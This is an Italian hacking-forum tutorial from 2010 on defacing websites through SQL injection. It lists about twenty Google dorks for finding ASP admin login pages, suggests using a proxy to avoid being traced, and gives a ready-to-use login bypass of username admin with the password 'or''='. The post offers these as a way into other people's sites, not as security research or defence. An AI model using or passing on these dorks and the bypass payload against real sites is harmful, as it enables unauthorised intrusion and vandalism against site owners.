Come defacciare siti con SQL Injection [FACILE]

Titolo: Come defacciare siti con SQL Injection [FACILE] Dom Ott 24, 2010 5:55 pm

Salve ragazzi,
ho creato questa guida per far scomparire tutti i topic da lamer in cui c'è scritto: "Ho defacciato un sito!" o "Sito vulnerabile!!!"
Dopo aver seguito questa guida chiunque potrà cimentarsi nella tecnica delle SQL Injection.
Qui posterò alcune dork che potrete utilizzare per trovare siti vulnerabili.
Le dork non sono altro che dei codici che fornisce google per cercare una determinata cosa. Le dork devono essere inserite nella barra di ricerca Google e vi troverà tutti i risultati.
Io consiglio di utilizzare un proxy prima di defacciare un sito.

Codice:: inurl:reserved.[url=http://adv.edintorni.net/click/?mo=L&ky=asp&af=7651&ct=it&rf=http%3A%2F%2Fwww%2Esciax2%2Eit%2Fforum%2Fguide%2Dtutorial%2Fcome%2Ddefacciare%2Dsiti%2Dsql%2Dinjection%2Dfacile%2D204760%2Ehtml&re=&ts=1287935603437&hs=5f7b2ad86bbec68f66c097b7680e9520]asp[/url]
inurl:/admin.asp"
inurl:/admin/login.asp
inurl:/admin/logon.asp
inurl:/admin_login.asp
inurl:/admin_logon.asp
inurl:/admin/adminlogin.asp
inurl:/admin/adminlogon.asp
inurl:/admin/admin_login.asp
inurl:/login.asp
inurl:/admin/admin.asp
inurl:/admin/admin_logon.asp
inurl:/administrator/admin.asp
inurl:/administrator/login.asp
inurl:/logon.asp
inurl:/adminlogin.asp
inurl:/adminlogon.asp
inurl:/administrator/logon.asp
inurl:root/login.asp
inurl:admin/index.asp

Nella barra del username inserite: admin
Nella barra della password inserite: 'or''='

Questa stringa di codice sfrutta un bug del login filtrato. Come defacciare siti con SQL Injection [FACILE] 784704

Come defacciare siti con SQL Injection [FACILE] 784704